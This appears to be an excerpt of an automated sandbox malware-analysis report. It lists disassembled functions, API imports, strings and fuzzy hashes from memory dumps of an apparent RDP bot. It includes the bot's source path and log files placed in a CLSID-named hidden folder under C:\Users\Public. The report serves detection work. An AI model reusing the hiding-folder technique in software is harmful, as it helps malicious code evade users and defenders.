Instruction ID: 38f902bf758e15e609f3a083d0efe2dd3d88ff53d42f31eab04d1e15d5b6924f
Opcode Fuzzy Hash: 3f6a0b15f8ca91d918480fae1623ca515a98658efb4e61b5bea6a53a6314fc42
Instruction Fuzzy Hash: 8D21BC22A08E86DAE7109F57F8407AA7764BBA47A4F444072EE6C27775CF3CE845C704

Function 00007FFE0EB49004 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0EB490A0
_strtoui64.MSVCRT ref: 00007FFE0EB490B6
_errno.MSVCRT ref: 00007FFE0EB490C0
_errno.MSVCRT ref: 00007FFE0EB490CC

Strings

ini_get_uint64, xrefs: 00007FFE0EB4907F, 00007FFE0EB490EC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB49086
(value != NULL), xrefs: 00007FFE0EB49078
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0EB490F3
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB49071

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
Instruction ID: 2af4fb2fc3beef764780ee551f62c638ddbc67e40f08003402780adadefd688d
Opcode Fuzzy Hash: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
Instruction Fuzzy Hash: 3C215762A08B4796E6329F19F8407AA33A4EB85794F444032EEDC477B5DF3CE985CB00

Function 00007FFE0EBD7AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0EBD7B50
_strtoui64.MSVCRT ref: 00007FFE0EBD7B66
_errno.MSVCRT ref: 00007FFE0EBD7B70
_errno.MSVCRT ref: 00007FFE0EBD7B7C

Strings

H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EBD7B21
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0EBD7BA3
ini_get_uint64, xrefs: 00007FFE0EBD7B2F, 00007FFE0EBD7B9C
(value != NULL), xrefs: 00007FFE0EBD7B28
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD7B36

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: 4ffbc5754ca2a88e4da89b9ce7d12ca71ab39645e176c06b388d4c6af5cf53aa
Instruction ID: b7819177722fb4ee3b91a0a767050e560c01d50c63999313dc036d0a2a5bb22e
Opcode Fuzzy Hash: 4ffbc5754ca2a88e4da89b9ce7d12ca71ab39645e176c06b388d4c6af5cf53aa
Instruction Fuzzy Hash: EB214622A08A8796E6619F15E8407EA33A4FB54798F544132EECD47779EF3CE985CB00

Function 00007FFE0EC08AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0EC08B50
_strtoui64.MSVCRT ref: 00007FFE0EC08B66
_errno.MSVCRT ref: 00007FFE0EC08B70
_errno.MSVCRT ref: 00007FFE0EC08B7C

Strings

(value != NULL), xrefs: 00007FFE0EC08B28
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EC08B36
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EC08B21
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0EC08BA3
ini_get_uint64, xrefs: 00007FFE0EC08B2F, 00007FFE0EC08B9C

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
Instruction ID: 4d6befd22f571c38c7dcc0dec290d0a0c7401fb3fcfd9dd79d7f4772616c2862
Opcode Fuzzy Hash: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
Instruction Fuzzy Hash: FA217A22A08A86A9E6119F55FC807AA7361FB85788F448032EE8C47774DF3ED985C702

Function 00007FFE0E16C974 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0E16CA10
_strtoui64.MSVCRT ref: 00007FFE0E16CA26
_errno.MSVCRT ref: 00007FFE0E16CA30
_errno.MSVCRT ref: 00007FFE0E16CA3C

Strings

ini_get_uint64, xrefs: 00007FFE0E16C9EF, 00007FFE0E16CA5C
(value != NULL), xrefs: 00007FFE0E16C9E8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16C9F6
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16C9E1
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0E16CA63

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
Instruction ID: a0f4585151e7d89a01ac7b80dbb5c4765a4e07935952c2e35098b0c435e8e8c3
Opcode Fuzzy Hash: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
Instruction Fuzzy Hash: 6A21AB62A08A8795E7109F59F8407AA7361FB88B88F444033EECD47675DF3CE949C740

Function 00007FFE13308FD0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE133090BC

Strings

(sec != NULL), xrefs: 00007FFE13309012
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE13309135
(name != NULL), xrefs: 00007FFE13309045
ini_get_var, xrefs: 00007FFE13309019, 00007FFE1330904C, 00007FFE1330907F, 00007FFE133090E6, 00007FFE1330912E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13309020, 00007FFE13309053, 00007FFE13309086
(var != NULL), xrefs: 00007FFE13309078
NULL, xrefs: 00007FFE1330914E, 00007FFE13309157
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1330900B, 00007FFE1330903E, 00007FFE13309071
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE133090ED

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-2568489879
Opcode ID: 7d520cff398a984ea8688f066155e03d6f99e8cd0eccc00a71914ee201134051
Instruction ID: 0349c5dfaae0b6439ed535a59382ed0262286e983d2572cd900bcd030cb87bf3
Opcode Fuzzy Hash: 7d520cff398a984ea8688f066155e03d6f99e8cd0eccc00a71914ee201134051
Instruction Fuzzy Hash: 16418FA1A08E47E9FA248B43E9017F82360BF64374F4441B6DA7C665B6DF7DEA45C308

Function 00007FFE0EBD7590 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EBD767C

Strings

H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EBD75CB, 00007FFE0EBD75FE, 00007FFE0EBD7631
(name != NULL), xrefs: 00007FFE0EBD7605
NULL, xrefs: 00007FFE0EBD770E, 00007FFE0EBD7717
ini_get_var, xrefs: 00007FFE0EBD75D9, 00007FFE0EBD760C, 00007FFE0EBD763F, 00007FFE0EBD76A6, 00007FFE0EBD76EE
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0EBD76F5
(sec != NULL), xrefs: 00007FFE0EBD75D2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD75E0, 00007FFE0EBD7613, 00007FFE0EBD7646
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0EBD76AD
(var != NULL), xrefs: 00007FFE0EBD7638

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-2568489879
Opcode ID: e613a4d6a4c68f407f0f19450277476f0728d1ddb465450c7adc01a39230389b
Instruction ID: d7303eaa73cbf4865c15a0d2a3a7dbe79c3125382001618350db4ca00d1dbb7b
Opcode Fuzzy Hash: e613a4d6a4c68f407f0f19450277476f0728d1ddb465450c7adc01a39230389b
Instruction Fuzzy Hash: DA412761A0D65791FA758F98E9403F42360BB14358F844532DADD462BEFF3CEA49CB00

Function 00007FFE13308E49 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE13308F3D

Strings

[D] (%s) -> Done(name=%s), xrefs: 00007FFE13308F5D
(sec != NULL), xrefs: 00007FFE13308EF1
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE13308F9B
(name != NULL), xrefs: 00007FFE13308EBE
ini_get_sec, xrefs: 00007FFE13308E92, 00007FFE13308EC5, 00007FFE13308EF8, 00007FFE13308F56, 00007FFE13308F94
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13308E99, 00007FFE13308ECC, 00007FFE13308EFF
NULL, xrefs: 00007FFE13308FB4
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13308E84, 00007FFE13308EB7, 00007FFE13308EEA
(ini != NULL), xrefs: 00007FFE13308E8B

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-3977765790
Opcode ID: 973422c728677154eece02d56bbef35a34d318f288ef4d77e120ecefbc4c514b
Instruction ID: 067e13ea8ab240dddd25aaf7a9333334aadeae5a7a664d5f61466a21056bfd09
Opcode Fuzzy Hash: 973422c728677154eece02d56bbef35a34d318f288ef4d77e120ecefbc4c514b
Instruction Fuzzy Hash: 084164A1A08E47E9FA208B12F8017F82611BF64378F4441B6DA6C2A5B6DF7CE546C308

Function 00007FFE0EB48959 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EB48A4D

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB489A9, 00007FFE0EB489DC, 00007FFE0EB48A0F
NULL, xrefs: 00007FFE0EB48AC4
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0EB48A6D
ini_get_sec, xrefs: 00007FFE0EB489A2, 00007FFE0EB489D5, 00007FFE0EB48A08, 00007FFE0EB48A66, 00007FFE0EB48AA4
(name != NULL), xrefs: 00007FFE0EB489CE
(sec != NULL), xrefs: 00007FFE0EB48A01
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0EB48AAB
(ini != NULL), xrefs: 00007FFE0EB4899B
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB48994, 00007FFE0EB489C7, 00007FFE0EB489FA

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-3977765790
Opcode ID: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
Instruction ID: ab49d71ce59add776440cfaa352fa51808657bed9c795a525127525b74806d73
Opcode Fuzzy Hash: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
Instruction Fuzzy Hash: 75413AA2A09747D1FA359F54E8403F463A0FF40748F488532EA9D5A5F5EF7CA989CB40

Function 00007FFE0EBD7409 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EBD74FD

Strings

H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EBD7444, 00007FFE0EBD7477, 00007FFE0EBD74AA
(name != NULL), xrefs: 00007FFE0EBD747E
NULL, xrefs: 00007FFE0EBD7574
(ini != NULL), xrefs: 00007FFE0EBD744B
(sec != NULL), xrefs: 00007FFE0EBD74B1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD7459, 00007FFE0EBD748C, 00007FFE0EBD74BF
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0EBD751D
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0EBD755B
ini_get_sec, xrefs: 00007FFE0EBD7452, 00007FFE0EBD7485, 00007FFE0EBD74B8, 00007FFE0EBD7516, 00007FFE0EBD7554

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-3977765790
Opcode ID: 6c6f481a4ffe8623e0882f049edd88d4a5de71fec80fc19a5a7b52b7f6d98842
Instruction ID: bde5095a396633b0b301021f83e4fe142469f943317a2b3ccfb1ebbbed61b827
Opcode Fuzzy Hash: 6c6f481a4ffe8623e0882f049edd88d4a5de71fec80fc19a5a7b52b7f6d98842
Instruction Fuzzy Hash: 67411A61E0C65795FA728F54E8417F42360AB20398F445533DACE4A6BAEE3CE54ACB01

Function 00007FF6BFD6824D Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6BFD68258
strlen.MSVCRT ref: 00007FF6BFD68274
strlen.MSVCRT ref: 00007FF6BFD68280
strlen.MSVCRT ref: 00007FF6BFD6830A
strlen.MSVCRT ref: 00007FF6BFD68337

Strings

.applied, xrefs: 00007FF6BFD68312
pkg, xrefs: 00007FF6BFD68296
tch.pkg, xrefs: 00007FF6BFD682D7
update.p, xrefs: 00007FF6BFD68289
????-pat, xrefs: 00007FF6BFD682CA

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: strlen
String ID: .applied$????-pat$pkg$tch.pkg$update.p
API String ID: 39653677-1686225151
Opcode ID: 991dd80c700aa1ae76ec81c81c963b3872b3b5c0a8959d8b97ae4b1278808ee7
Instruction ID: e076fba3db31b208f69605e6508bab6ab4acc2978b56f816058f258cbab96700
Opcode Fuzzy Hash: 991dd80c700aa1ae76ec81c81c963b3872b3b5c0a8959d8b97ae4b1278808ee7
Instruction Fuzzy Hash: 3721C512A48B43A5FB256AAD591437D37914F597CCF084230EB4EDB3A2DE2CE85483C0

Function 00007FFE11501292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1150133E
fflush.MSVCRT ref: 00007FFE1150134A
EnterCriticalSection.KERNEL32 ref: 00007FFE11501363
LeaveCriticalSection.KERNEL32 ref: 00007FFE1150138B
CopyFileA.KERNEL32 ref: 00007FFE115013E8

Strings

., xrefs: 00007FFE115013CD
1, xrefs: 00007FFE115013D2
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE115013AB

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
API String ID: 513531256-3034662401
Opcode ID: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
Instruction ID: b776ba94bfd13357d3ec6570badcb94ea47f16415f835727423387926bc860ed
Opcode Fuzzy Hash: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
Instruction Fuzzy Hash: 34415F61A0CA4186F322EB52E8543FE73AAFB887A0F540075DA4D47BB5DF2CE5468741

Function 00007FFE1330A202 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1330A2AE
fflush.MSVCRT ref: 00007FFE1330A2BA
EnterCriticalSection.KERNEL32 ref: 00007FFE1330A2D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE1330A2FB
CopyFileA.KERNEL32 ref: 00007FFE1330A358

Strings

1, xrefs: 00007FFE1330A342
., xrefs: 00007FFE1330A33D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFE1330A31B

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
API String ID: 513531256-1680544107
Opcode ID: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
Instruction ID: 4975a21258dca3bda3a6befafda07c5c970e183ed2a1c9efe8bfc6bf053b5280
Opcode Fuzzy Hash: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
Instruction Fuzzy Hash: F2417E21A0CE418EF320DB12E8547AE7750FBA47A0F4401B1DA5D6B7A6CF3DE596874C

Function 00007FFE0EB41292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0EB4133E
fflush.MSVCRT ref: 00007FFE0EB4134A
EnterCriticalSection.KERNEL32 ref: 00007FFE0EB41363
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4138B
CopyFileA.KERNEL32 ref: 00007FFE0EB413E8

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE0EB413AB
., xrefs: 00007FFE0EB413CD
1, xrefs: 00007FFE0EB413D2

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
